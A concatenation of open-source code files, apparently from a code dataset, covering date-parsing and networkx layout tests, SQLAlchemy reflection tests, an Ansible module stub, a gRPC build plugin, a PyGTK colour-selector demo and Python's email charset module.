@returns: updated date """
if day is None:
day = aday.day
if aday.month == 12:
return aday.replace(day=day, month=1, year=aday.year + 1)
else:
return aday.replace(day=day, month=aday.month + 1)
class TestDates(TestCase):
def test_parses_common_formats(self):
self.assertEqual(str(Date.parse("1985-03-29")), "1985-03-29")
self.assertEqual(str(Date.parse("19850329")), "1985-03-29")
self.assertEqual(str(Date.parse("1985/03/29")), "1985-03-29")
def test_parses_todays_month_day_format(self):
today = date.today()
parse_string = "%02d%02d" % (today.month, today.day)
self.assertEqual(Date.parse(parse_string), today)
def test_parses_today_as_today(self):
today = date.today()
self.assertEqual(Date(today), today)
def test_parse_fuzzy_dates(self):
""" Parse fuzzy dates like now, soon, later, someday """
self.assertEqual(Date.parse("now"), Date.now())
self.assertEqual(Date.parse("soon"), Date.soon())
self.assertEqual(Date.parse("later"), Date.someday())
self.assertEqual(Date.parse("someday"), Date.someday())
self.assertEqual(Date.parse(""), Date.no_date())
def test_parse_local_fuzzy_dates(self):
""" Parse fuzzy dates in their localized version """
self.assertEqual(Date.parse(_("now")), Date.now())
self.assertEqual(Date.parse(_("soon")), Date.soon())
self.assertEqual(Date.parse(_("later")), Date.someday())
self.assertEqual(Date.parse(_("someday")), Date.someday())
self.assertEqual(Date.parse(""), Date.no_date())
def test_parse_fuzzy_dates_str(self):
""" Print fuzzy dates in localized version """
self.assertEqual(str(Date.parse("now")), _("now"))
self.assertEqual(str(Date.parse("soon")), _("soon"))
self.assertEqual(str(Date.parse("later")), _("someday"))
self.assertEqual(str(Date.parse("someday")), _("someday"))
self.assertEqual(str(Date.parse("")), "")
def test_parse_week_days(self):
""" Parse name of week days and don't care about case-sensitivity """
weekday = date.today().weekday()
for i, day in enumerate(['Monday', 'Tuesday', 'Wednesday',
'Thursday', 'Friday', 'Saturday', 'Sunday']):
if i <= weekday:
expected = date.today() + timedelta(7 + i - weekday)
else:
expected = date.today() + timedelta(i - weekday)
self.assertEqual(Date.parse(day), expected)
self.assertEqual(Date.parse(day.lower()), expected)
self.assertEqual(Date.parse(day.upper()), expected)
# Test localized version
day = _(day)
self.assertEqual(Date.parse(day), expected)
self.assertEqual(Date.parse(day.lower()), expected)
self.assertEqual(Date.parse(day.upper()), expected)
    def test_missing_year_this_year(self):
        """ Parsing %m%d has to find the correct date:
we enter a day this year """
aday = next_month(date.today(), day=1)
parse_string = "%02d%02d" % (aday.month, aday.day)
self.assertEqual(Date.parse(parse_string), aday)
    def test_missing_year_next_year(self):
        """ Parsing %m%d has to find the correct date:
we enter a day the next year """
aday = date.today()
if aday.day == 1 and aday.month == 1:
# not possible to add a day next year
return
aday = aday.replace(year=aday.year + 1, month=1, day=1)
self.assertEqual(Date.parse("0101"), aday)
    def test_on_certain_day(self):
        """ Parse due:3 as the 3rd day of this month, or of next month
        if the 3rd of this month has already passed (or is today) """
for i in range(28):
i += 1
aday = date.today()
if i <= aday.day:
aday = next_month(aday, i)
else:
aday = aday.replace(day=i)
self.assertEqual(Date.parse(str(i)), aday)
| gpl-3.0 |
kernc/networkx | networkx/drawing/tests/test_layout.py | 43 | 1870 | """Unit tests for layout functions."""
import sys
from nose import SkipTest
from nose.tools import assert_equal
import networkx as nx
class TestLayout(object):
numpy=1 # nosetests attribute, use nosetests -a 'not numpy' to skip test
@classmethod
def setupClass(cls):
global numpy
try:
import numpy
except ImportError:
raise SkipTest('numpy not available.')
def setUp(self):
self.Gi=nx.grid_2d_graph(5,5)
self.Gs=nx.Graph()
self.Gs.add_path('abcdef')
self.bigG=nx.grid_2d_graph(25,25) #bigger than 500 nodes for sparse
def test_smoke_int(self):
G=self.Gi
vpos=nx.random_layout(G)
vpos=nx.circular_layout(G)
vpos=nx.spring_layout(G)
vpos=nx.fruchterman_reingold_layout(G)
vpos=nx.spectral_layout(G)
vpos=nx.spectral_layout(self.bigG)
vpos=nx.shell_layout(G)
def test_smoke_string(self):
G=self.Gs
vpos=nx.random_layout(G)
vpos=nx.circular_layout(G)
vpos=nx.spring_layout(G)
vpos=nx.fruchterman_reingold_layout(G)
vpos=nx.spectral_layout(G)
vpos=nx.shell_layout(G)
def test_adjacency_interface_numpy(self):
A=nx.to_numpy_matrix(self.Gs)
pos=nx.drawing.layout._fruchterman_reingold(A)
pos=nx.drawing.layout._fruchterman_reingold(A,dim=3)
assert_equal(pos.shape,(6,3))
def test_adjacency_interface_scipy(self):
try:
import scipy
except ImportError:
raise SkipTest('scipy not available.')
A=nx.to_scipy_sparse_matrix(self.Gs,dtype='d')
pos=nx.drawing.layout._sparse_fruchterman_reingold(A)
pos=nx.drawing.layout._sparse_spectral(A)
pos=nx.drawing.layout._sparse_fruchterman_reingold(A,dim=3)
assert_equal(pos.shape,(6,3))
| bsd-3-clause |
Alignak-monitoring-contrib/alignak-webui | alignak_webui/plugins/grafana/grafana.py | 1 | 1479 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2018:
# Frederic Mohier, [email protected]
#
# This file is part of (WebUI).
#
# (WebUI) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (WebUI) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (WebUI). If not, see <http://www.gnu.org/licenses/>.
"""
Plugin Livestate
"""
from logging import getLogger
from alignak_webui.utils.plugin import Plugin
# pylint: disable=invalid-name
logger = getLogger(__name__)
class PluginGrafana(Plugin):
""" Grafana plugin """
def __init__(self, webui, plugin_dir, cfg_filenames=None):
"""Grafana plugin"""
self.name = 'Grafana'
self.backend_endpoint = None
self.pages = {
}
super(PluginGrafana, self).__init__(webui, plugin_dir, cfg_filenames)
def is_enabled(self):
"""Returns True if plugin is enabled"""
if self.enabled and self.app.config.get('grafana', ''):
return True
return False
| agpl-3.0 |
jhawkesworth/ansible-modules-core | windows/win_stat.py | 66 | 1711 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub, actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_stat
version_added: "1.7"
short_description: returns information about a Windows file
description:
- Returns information about a Windows file
options:
path:
description:
- The full path of the file/object to get the facts of; both forward and
back slashes are accepted.
required: true
default: null
aliases: []
get_md5:
description:
- Whether to return the checksum sum of the file. As of Ansible 1.9 this
is no longer a MD5, but a SHA1 instead.
required: false
default: yes
aliases: []
get_checksum:
description:
- Whether to return a checksum of the file
(only sha1 currently supported)
required: false
default: yes
version_added: "2.1"
author: "Chris Church (@cchurch)"
'''
EXAMPLES = '''
# Obtain information about a file
- win_stat: path=C:\\foo.ini
register: file_info
- debug: var=file_info
'''
| gpl-3.0 |
cortedeltimo/SickRage | lib/sqlalchemy/testing/suite/test_reflection.py | 76 | 19615 |
import sqlalchemy as sa
from sqlalchemy import exc as sa_exc
from sqlalchemy import types as sql_types
from sqlalchemy import inspect
from sqlalchemy import MetaData, Integer, String
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.testing import engines, fixtures
from sqlalchemy.testing.schema import Table, Column
from sqlalchemy.testing import eq_, assert_raises_message
from sqlalchemy import testing
from .. import config
import operator
from sqlalchemy.schema import DDL, Index
from sqlalchemy import event
metadata, users = None, None
class HasTableTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table('test_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', String(50))
)
def test_has_table(self):
with config.db.begin() as conn:
assert config.db.dialect.has_table(conn, "test_table")
assert not config.db.dialect.has_table(conn, "nonexistent_table")
class ComponentReflectionTest(fixtures.TablesTest):
run_inserts = run_deletes = None
__backend__ = True
@classmethod
def define_tables(cls, metadata):
cls.define_reflected_tables(metadata, None)
if testing.requires.schemas.enabled:
cls.define_reflected_tables(metadata, "test_schema")
@classmethod
def define_reflected_tables(cls, metadata, schema):
if schema:
schema_prefix = schema + "."
else:
schema_prefix = ""
if testing.requires.self_referential_foreign_keys.enabled:
users = Table('users', metadata,
Column('user_id', sa.INT, primary_key=True),
Column('test1', sa.CHAR(5), nullable=False),
Column('test2', sa.Float(5), nullable=False),
Column('parent_user_id', sa.Integer,
sa.ForeignKey('%susers.user_id' % schema_prefix)),
schema=schema,
test_needs_fk=True,
)
else:
users = Table('users', metadata,
Column('user_id', sa.INT, primary_key=True),
Column('test1', sa.CHAR(5), nullable=False),
Column('test2', sa.Float(5), nullable=False),
schema=schema,
test_needs_fk=True,
)
Table("dingalings", metadata,
Column('dingaling_id', sa.Integer, primary_key=True),
Column('address_id', sa.Integer,
sa.ForeignKey('%semail_addresses.address_id' %
schema_prefix)),
Column('data', sa.String(30)),
schema=schema,
test_needs_fk=True,
)
Table('email_addresses', metadata,
Column('address_id', sa.Integer),
Column('remote_user_id', sa.Integer,
sa.ForeignKey(users.c.user_id)),
Column('email_address', sa.String(20)),
sa.PrimaryKeyConstraint('address_id', name='email_ad_pk'),
schema=schema,
test_needs_fk=True,
)
if testing.requires.index_reflection.enabled:
cls.define_index(metadata, users)
if testing.requires.view_column_reflection.enabled:
cls.define_views(metadata, schema)
@classmethod
def define_index(cls, metadata, users):
Index("users_t_idx", users.c.test1, users.c.test2)
Index("users_all_idx", users.c.user_id, users.c.test2, users.c.test1)
@classmethod
def define_views(cls, metadata, schema):
for table_name in ('users', 'email_addresses'):
fullname = table_name
if schema:
fullname = "%s.%s" % (schema, table_name)
view_name = fullname + '_v'
query = "CREATE VIEW %s AS SELECT * FROM %s" % (
view_name, fullname)
event.listen(
metadata,
"after_create",
DDL(query)
)
event.listen(
metadata,
"before_drop",
DDL("DROP VIEW %s" % view_name)
)
@testing.requires.schema_reflection
def test_get_schema_names(self):
insp = inspect(testing.db)
self.assert_('test_schema' in insp.get_schema_names())
@testing.requires.schema_reflection
def test_dialect_initialize(self):
engine = engines.testing_engine()
assert not hasattr(engine.dialect, 'default_schema_name')
inspect(engine)
assert hasattr(engine.dialect, 'default_schema_name')
@testing.requires.schema_reflection
def test_get_default_schema_name(self):
insp = inspect(testing.db)
eq_(insp.default_schema_name, testing.db.dialect.default_schema_name)
@testing.provide_metadata
def _test_get_table_names(self, schema=None, table_type='table',
order_by=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
insp = inspect(meta.bind)
if table_type == 'view':
table_names = insp.get_view_names(schema)
table_names.sort()
answer = ['email_addresses_v', 'users_v']
eq_(sorted(table_names), answer)
else:
table_names = insp.get_table_names(schema,
order_by=order_by)
if order_by == 'foreign_key':
answer = ['users', 'email_addresses', 'dingalings']
eq_(table_names, answer)
else:
answer = ['dingalings', 'email_addresses', 'users']
eq_(sorted(table_names), answer)
@testing.requires.table_reflection
def test_get_table_names(self):
self._test_get_table_names()
@testing.requires.table_reflection
@testing.requires.foreign_key_constraint_reflection
def test_get_table_names_fks(self):
self._test_get_table_names(order_by='foreign_key')
@testing.requires.table_reflection
@testing.requires.schemas
def test_get_table_names_with_schema(self):
self._test_get_table_names('test_schema')
@testing.requires.view_column_reflection
def test_get_view_names(self):
self._test_get_table_names(table_type='view')
@testing.requires.view_column_reflection
@testing.requires.schemas
def test_get_view_names_with_schema(self):
self._test_get_table_names('test_schema', table_type='view')
@testing.requires.table_reflection
@testing.requires.view_column_reflection
def test_get_tables_and_views(self):
self._test_get_table_names()
self._test_get_table_names(table_type='view')
def _test_get_columns(self, schema=None, table_type='table'):
meta = MetaData(testing.db)
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
table_names = ['users', 'email_addresses']
if table_type == 'view':
table_names = ['users_v', 'email_addresses_v']
insp = inspect(meta.bind)
for table_name, table in zip(table_names, (users,
addresses)):
schema_name = schema
cols = insp.get_columns(table_name, schema=schema_name)
self.assert_(len(cols) > 0, len(cols))
# should be in order
for i, col in enumerate(table.columns):
eq_(col.name, cols[i]['name'])
ctype = cols[i]['type'].__class__
ctype_def = col.type
if isinstance(ctype_def, sa.types.TypeEngine):
ctype_def = ctype_def.__class__
# Oracle returns Date for DateTime.
if testing.against('oracle') and ctype_def \
in (sql_types.Date, sql_types.DateTime):
ctype_def = sql_types.Date
# assert that the desired type and return type share
# a base within one of the generic types.
self.assert_(len(set(ctype.__mro__).
intersection(ctype_def.__mro__).intersection([
sql_types.Integer,
sql_types.Numeric,
sql_types.DateTime,
sql_types.Date,
sql_types.Time,
sql_types.String,
sql_types._Binary,
])) > 0, '%s(%s), %s(%s)' % (col.name,
col.type, cols[i]['name'], ctype))
if not col.primary_key:
assert cols[i]['default'] is None
@testing.requires.table_reflection
def test_get_columns(self):
self._test_get_columns()
@testing.provide_metadata
def _type_round_trip(self, *types):
t = Table('t', self.metadata,
*[
Column('t%d' % i, type_)
for i, type_ in enumerate(types)
]
)
t.create()
return [
c['type'] for c in
inspect(self.metadata.bind).get_columns('t')
]
@testing.requires.table_reflection
def test_numeric_reflection(self):
for typ in self._type_round_trip(
sql_types.Numeric(18, 5),
):
assert isinstance(typ, sql_types.Numeric)
eq_(typ.precision, 18)
eq_(typ.scale, 5)
@testing.requires.table_reflection
def test_varchar_reflection(self):
typ = self._type_round_trip(sql_types.String(52))[0]
assert isinstance(typ, sql_types.String)
eq_(typ.length, 52)
@testing.requires.table_reflection
@testing.provide_metadata
def test_nullable_reflection(self):
t = Table('t', self.metadata,
Column('a', Integer, nullable=True),
Column('b', Integer, nullable=False))
t.create()
eq_(
dict(
(col['name'], col['nullable'])
for col in inspect(self.metadata.bind).get_columns('t')
),
{"a": True, "b": False}
)
@testing.requires.table_reflection
@testing.requires.schemas
def test_get_columns_with_schema(self):
self._test_get_columns(schema='test_schema')
@testing.requires.view_column_reflection
def test_get_view_columns(self):
self._test_get_columns(table_type='view')
@testing.requires.view_column_reflection
@testing.requires.schemas
def test_get_view_columns_with_schema(self):
self._test_get_columns(schema='test_schema', table_type='view')
@testing.provide_metadata
def _test_get_pk_constraint(self, schema=None):
meta = self.metadata
users, addresses = self.tables.users, self.tables.email_addresses
insp = inspect(meta.bind)
users_cons = insp.get_pk_constraint(users.name, schema=schema)
users_pkeys = users_cons['constrained_columns']
eq_(users_pkeys, ['user_id'])
addr_cons = insp.get_pk_constraint(addresses.name, schema=schema)
addr_pkeys = addr_cons['constrained_columns']
eq_(addr_pkeys, ['address_id'])
with testing.requires.reflects_pk_names.fail_if():
eq_(addr_cons['name'], 'email_ad_pk')
@testing.requires.primary_key_constraint_reflection
def test_get_pk_constraint(self):
self._test_get_pk_constraint()
@testing.requires.table_reflection
@testing.requires.primary_key_constraint_reflection
@testing.requires.schemas
def test_get_pk_constraint_with_schema(self):
self._test_get_pk_constraint(schema='test_schema')
@testing.requires.table_reflection
@testing.provide_metadata
def test_deprecated_get_primary_keys(self):
meta = self.metadata
users = self.tables.users
insp = Inspector(meta.bind)
assert_raises_message(
sa_exc.SADeprecationWarning,
"Call to deprecated method get_primary_keys."
" Use get_pk_constraint instead.",
insp.get_primary_keys, users.name
)
@testing.provide_metadata
def _test_get_foreign_keys(self, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
insp = inspect(meta.bind)
expected_schema = schema
# users
if testing.requires.self_referential_foreign_keys.enabled:
users_fkeys = insp.get_foreign_keys(users.name,
schema=schema)
fkey1 = users_fkeys[0]
with testing.requires.named_constraints.fail_if():
self.assert_(fkey1['name'] is not None)
eq_(fkey1['referred_schema'], expected_schema)
eq_(fkey1['referred_table'], users.name)
eq_(fkey1['referred_columns'], ['user_id', ])
if testing.requires.self_referential_foreign_keys.enabled:
eq_(fkey1['constrained_columns'], ['parent_user_id'])
#addresses
addr_fkeys = insp.get_foreign_keys(addresses.name,
schema=schema)
fkey1 = addr_fkeys[0]
with testing.requires.named_constraints.fail_if():
self.assert_(fkey1['name'] is not None)
eq_(fkey1['referred_schema'], expected_schema)
eq_(fkey1['referred_table'], users.name)
eq_(fkey1['referred_columns'], ['user_id', ])
eq_(fkey1['constrained_columns'], ['remote_user_id'])
@testing.requires.foreign_key_constraint_reflection
def test_get_foreign_keys(self):
self._test_get_foreign_keys()
@testing.requires.foreign_key_constraint_reflection
@testing.requires.schemas
def test_get_foreign_keys_with_schema(self):
self._test_get_foreign_keys(schema='test_schema')
@testing.provide_metadata
def _test_get_indexes(self, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
# The database may decide to create indexes for foreign keys, etc.
# so there may be more indexes than expected.
insp = inspect(meta.bind)
indexes = insp.get_indexes('users', schema=schema)
expected_indexes = [
{'unique': False,
'column_names': ['test1', 'test2'],
'name': 'users_t_idx'},
{'unique': False,
'column_names': ['user_id', 'test2', 'test1'],
'name': 'users_all_idx'}
]
index_names = [d['name'] for d in indexes]
for e_index in expected_indexes:
assert e_index['name'] in index_names
index = indexes[index_names.index(e_index['name'])]
for key in e_index:
eq_(e_index[key], index[key])
@testing.requires.index_reflection
def test_get_indexes(self):
self._test_get_indexes()
@testing.requires.index_reflection
@testing.requires.schemas
def test_get_indexes_with_schema(self):
self._test_get_indexes(schema='test_schema')
@testing.requires.unique_constraint_reflection
def test_get_unique_constraints(self):
self._test_get_unique_constraints()
@testing.requires.unique_constraint_reflection
@testing.requires.schemas
def test_get_unique_constraints_with_schema(self):
self._test_get_unique_constraints(schema='test_schema')
@testing.provide_metadata
def _test_get_unique_constraints(self, schema=None):
uniques = sorted(
[
{'name': 'unique_a', 'column_names': ['a']},
{'name': 'unique_a_b_c', 'column_names': ['a', 'b', 'c']},
{'name': 'unique_c_a_b', 'column_names': ['c', 'a', 'b']},
{'name': 'unique_asc_key', 'column_names': ['asc', 'key']},
],
key=operator.itemgetter('name')
)
orig_meta = self.metadata
table = Table(
'testtbl', orig_meta,
Column('a', sa.String(20)),
Column('b', sa.String(30)),
Column('c', sa.Integer),
# reserved identifiers
Column('asc', sa.String(30)),
Column('key', sa.String(30)),
schema=schema
)
for uc in uniques:
table.append_constraint(
sa.UniqueConstraint(*uc['column_names'], name=uc['name'])
)
orig_meta.create_all()
inspector = inspect(orig_meta.bind)
reflected = sorted(
inspector.get_unique_constraints('testtbl', schema=schema),
key=operator.itemgetter('name')
)
for orig, refl in zip(uniques, reflected):
eq_(orig, refl)
@testing.provide_metadata
def _test_get_view_definition(self, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
view_name1 = 'users_v'
view_name2 = 'email_addresses_v'
insp = inspect(meta.bind)
v1 = insp.get_view_definition(view_name1, schema=schema)
self.assert_(v1)
v2 = insp.get_view_definition(view_name2, schema=schema)
self.assert_(v2)
@testing.requires.view_reflection
def test_get_view_definition(self):
self._test_get_view_definition()
@testing.requires.view_reflection
@testing.requires.schemas
def test_get_view_definition_with_schema(self):
self._test_get_view_definition(schema='test_schema')
@testing.only_on("postgresql", "PG specific feature")
@testing.provide_metadata
def _test_get_table_oid(self, table_name, schema=None):
meta = self.metadata
users, addresses, dingalings = self.tables.users, \
self.tables.email_addresses, self.tables.dingalings
insp = inspect(meta.bind)
oid = insp.get_table_oid(table_name, schema)
self.assert_(isinstance(oid, int))
def test_get_table_oid(self):
self._test_get_table_oid('users')
@testing.requires.schemas
def test_get_table_oid_with_schema(self):
self._test_get_table_oid('users', schema='test_schema')
@testing.requires.table_reflection
@testing.provide_metadata
def test_autoincrement_col(self):
"""test that 'autoincrement' is reflected according to sqla's policy.
Don't mark this test as unsupported for any backend !
(technically it fails with MySQL InnoDB since "id" comes before "id2")
A backend is better off not returning "autoincrement" at all,
instead of potentially returning "False" for an auto-incrementing
primary key column.
"""
meta = self.metadata
insp = inspect(meta.bind)
for tname, cname in [
('users', 'user_id'),
('email_addresses', 'address_id'),
('dingalings', 'dingaling_id'),
]:
cols = insp.get_columns(tname)
id_ = dict((c['name'], c) for c in cols)[cname]
assert id_.get('autoincrement', True)
__all__ = ('ComponentReflectionTest', 'HasTableTest')
| gpl-3.0 |
leifurhauks/grpc | tools/buildgen/plugins/expand_bin_attrs.py | 31 | 2515 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Buildgen expand binary attributes plugin.
This fills in any optional attributes.
"""
def mako_plugin(dictionary):
  """The exported plugin code for expand_bin_attrs.
  Fills in the optional attributes of each target (flaky, platforms,
  ci_platforms, boringssl, zlib, gtest) and of each lib (boringssl, zlib)
  with their default values when build.yaml leaves them unset.
"""
targets = dictionary.get('targets')
default_platforms = ['windows', 'posix', 'linux', 'mac']
for tgt in targets:
tgt['flaky'] = tgt.get('flaky', False)
tgt['platforms'] = sorted(tgt.get('platforms', default_platforms))
tgt['ci_platforms'] = sorted(tgt.get('ci_platforms', tgt['platforms']))
tgt['boringssl'] = tgt.get('boringssl', False)
tgt['zlib'] = tgt.get('zlib', False)
tgt['gtest'] = tgt.get('gtest', False)
libs = dictionary.get('libs')
for lib in libs:
lib['boringssl'] = lib.get('boringssl', False)
lib['zlib'] = lib.get('zlib', False)
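# Illustrative effect (hypothetical build.yaml entry): a target given only as
#   {'name': 't1'}
# leaves mako_plugin with the defaults filled in, i.e.
#   {'name': 't1', 'flaky': False,
#    'platforms': ['linux', 'mac', 'posix', 'windows'],
#    'ci_platforms': ['linux', 'mac', 'posix', 'windows'],
#    'boringssl': False, 'zlib': False, 'gtest': False}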
| bsd-3-clause |
GNOME/pygtk | examples/pygtk-demo/demos/colorsel.py | 6 | 2059 | #!/usr/bin/env python
"""Color Selector
GtkColorSelection lets the user choose a color. GtkColorSelectionDialog is a
prebuilt dialog containing a GtkColorSelection."""
import pygtk
pygtk.require('2.0')
import gtk
class ColorSelectorDemo(gtk.Window):
color = gtk.gdk.color_parse("blue")
def __init__(self, parent=None):
# Create the toplevel window
gtk.Window.__init__(self)
try:
self.set_screen(parent.get_screen())
except AttributeError:
self.connect('destroy', lambda *w: gtk.main_quit())
self.set_title(self.__class__.__name__)
self.set_border_width(8)
vbox = gtk.VBox()
vbox.set_border_width(8)
self.add(vbox)
# Create the color swatch area
frame = gtk.Frame()
frame.set_shadow_type(gtk.SHADOW_IN)
vbox.pack_start(frame, True, True, 8)
self.d_area = gtk.DrawingArea()
self.d_area.set_size_request(200, 200)
self.d_area.modify_bg(gtk.STATE_NORMAL, self.color)
frame.add(self.d_area)
alignment = gtk.Alignment(1.0, 0.5, 0.0, 0.0)
button = gtk.Button("_Change the above color")
alignment.add(button)
vbox.pack_start(alignment, True, True)
button.connect('clicked', self.on_change_color_clicked)
button.set_flags(gtk.CAN_DEFAULT)
button.grab_default()
self.show_all()
def on_change_color_clicked(self, button):
dialog = gtk.ColorSelectionDialog("Changing color")
dialog.set_transient_for(self)
colorsel = dialog.colorsel
colorsel.set_previous_color(self.color)
colorsel.set_current_color(self.color)
colorsel.set_has_palette(True)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.color = colorsel.get_current_color()
self.d_area.modify_bg(gtk.STATE_NORMAL, self.color)
dialog.destroy()
return True
def main():
ColorSelectorDemo()
gtk.main()
if __name__ == '__main__':
main()
| lgpl-2.1 |
0Chencc/CTFCrackTools | Lib/Lib/email/charset.py | 180 | 16043 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: [email protected]
__all__ = [
'Charset',
'add_alias',
'add_charset',
'add_codec',
]
import codecs
import email.base64mime
import email.quoprimime
from email import errors
from email.encoders import encode_7or8bit
# Flags for types of header encodings
QP = 1 # Quoted-Printable
BASE64 = 2 # Base64
SHORTEST = 3 # the shorter of QP and base64, but only for headers
# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7
MISC_LEN = 7
DEFAULT_CHARSET = 'us-ascii'
# Defaults
CHARSETS = {
# input header enc body enc output conv
'iso-8859-1': (QP, QP, None),
'iso-8859-2': (QP, QP, None),
'iso-8859-3': (QP, QP, None),
'iso-8859-4': (QP, QP, None),
# iso-8859-5 is Cyrillic, and not especially used
# iso-8859-6 is Arabic, also not particularly used
# iso-8859-7 is Greek, QP will not make it readable
# iso-8859-8 is Hebrew, QP will not make it readable
'iso-8859-9': (QP, QP, None),
'iso-8859-10': (QP, QP, None),
# iso-8859-11 is Thai, QP will not make it readable
'iso-8859-13': (QP, QP, None),
'iso-8859-14': (QP, QP, None),
'iso-8859-15': (QP, QP, None),
'iso-8859-16': (QP, QP, None),
'windows-1252':(QP, QP, None),
'viscii': (QP, QP, None),
'us-ascii': (None, None, None),
'big5': (BASE64, BASE64, None),
'gb2312': (BASE64, BASE64, None),
'euc-jp': (BASE64, None, 'iso-2022-jp'),
'shift_jis': (BASE64, None, 'iso-2022-jp'),
'iso-2022-jp': (BASE64, None, None),
'koi8-r': (BASE64, BASE64, None),
'utf-8': (SHORTEST, BASE64, 'utf-8'),
# We're making this one up to represent raw unencoded 8-bit
'8bit': (None, BASE64, 'utf-8'),
}
# Aliases for other commonly-used names for character sets. Map
# them to the real ones used in email.
ALIASES = {
'latin_1': 'iso-8859-1',
'latin-1': 'iso-8859-1',
'latin_2': 'iso-8859-2',
'latin-2': 'iso-8859-2',
'latin_3': 'iso-8859-3',
'latin-3': 'iso-8859-3',
'latin_4': 'iso-8859-4',
'latin-4': 'iso-8859-4',
'latin_5': 'iso-8859-9',
'latin-5': 'iso-8859-9',
'latin_6': 'iso-8859-10',
'latin-6': 'iso-8859-10',
'latin_7': 'iso-8859-13',
'latin-7': 'iso-8859-13',
'latin_8': 'iso-8859-14',
'latin-8': 'iso-8859-14',
'latin_9': 'iso-8859-15',
'latin-9': 'iso-8859-15',
'latin_10':'iso-8859-16',
'latin-10':'iso-8859-16',
'cp949': 'ks_c_5601-1987',
'euc_jp': 'euc-jp',
'euc_kr': 'euc-kr',
'ascii': 'us-ascii',
}
# Map charsets to their Unicode codec strings.
CODEC_MAP = {
'gb2312': 'eucgb2312_cn',
'big5': 'big5_tw',
# Hack: We don't want *any* conversion for stuff marked us-ascii, as all
# sorts of garbage might be sent to us in the guise of 7-bit us-ascii.
# Let that stuff pass through without conversion to/from Unicode.
'us-ascii': None,
}
# Convenience functions for extending the above mappings
def add_charset(charset, header_enc=None, body_enc=None, output_charset=None):
"""Add character set properties to the global registry.
charset is the input character set, and must be the canonical name of a
character set.
Optional header_enc and body_enc is either Charset.QP for
quoted-printable, Charset.BASE64 for base64 encoding, Charset.SHORTEST for
the shortest of qp or base64 encoding, or None for no encoding. SHORTEST
is only valid for header_enc. It describes how message headers and
message bodies in the input charset are to be encoded. Default is no
encoding.
Optional output_charset is the character set that the output should be
in. Conversions will proceed from input charset, to Unicode, to the
output charset when the method Charset.convert() is called. The default
is to output in the same character set as the input.
Both input_charset and output_charset must have Unicode codec entries in
the module's charset-to-codec mapping; use add_codec(charset, codecname)
to add codecs the module does not know about. See the codecs module's
documentation for more information.
"""
if body_enc == SHORTEST:
raise ValueError('SHORTEST not allowed for body_enc')
CHARSETS[charset] = (header_enc, body_enc, output_charset)
def add_alias(alias, canonical):
"""Add a character set alias.
alias is the alias name, e.g. latin-1
canonical is the character set's canonical name, e.g. iso-8859-1
"""
ALIASES[alias] = canonical
def add_codec(charset, codecname):
"""Add a codec that map characters in the given charset to/from Unicode.
charset is the canonical name of a character set. codecname is the name
of a Python codec, as appropriate for the second argument to the unicode()
built-in, or to the encode() method of a Unicode string.
"""
CODEC_MAP[charset] = codecname
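# Illustrative use of the three registration helpers above. The charset and
# alias names here are hypothetical examples, not defaults of this module;
# 'mac_roman' is a standard Python codec name:
#
#     add_codec('x-mac-roman', 'mac_roman')
#     add_alias('macroman', 'x-mac-roman')
#     add_charset('x-mac-roman', header_enc=QP, body_enc=BASE64,
#                 output_charset='utf-8')
#
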